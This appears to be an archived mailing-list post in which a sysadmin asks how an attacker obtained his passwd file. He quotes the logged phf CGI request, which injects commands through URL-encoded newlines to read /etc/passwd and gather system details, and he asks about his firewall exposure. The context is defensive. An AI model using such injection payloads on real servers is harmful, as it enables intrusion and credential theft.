Hello again,
Thanks to all of the responces that I have received on this.
One more question....
exactly how did they get my passwd file?
I typed in the URL from my log file into my browser....
http://myserver.somwhere.com/cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0
and I got this in return in my browser....
Query Results
/usr/local/bin/ph -m -s ns.uiuc.edu\ cat /etc/passwd\ ypcat passwd\ pwd\ id\ uname -a\ name=foo
Where is the passwd file?
OK! Let's say that they did get my passwd file.....
How much damage can they do if I have a firewall in place that my web server
sits behind? The only services available from this host to the Internet is
http, dns, and smtp. So services like ftp and telnet would be denied if they
tried. Is there something I am missing?
Thanks again,
Stan Wnuck swnuck @
unixpros .
com
Unixpros, Inc.
10 Industrial Way East (908) 389-3295 x542
Eatontown, NJ 07724 (908) 389-5461 Fax
PM-CHS Technology Insertion Office
Ft. Monmouth Army Base, NJ (908) 427-2033 / 427-6963
Follow-Ups:
-
Re: psswd HACK
From: "Sameer R. Manek" <manek @
challenger .
atc .
fhda .
edu>
-
Re: psswd HACK
From: "Paul D. Robertson" <proberts @
clark .
net>
|
|
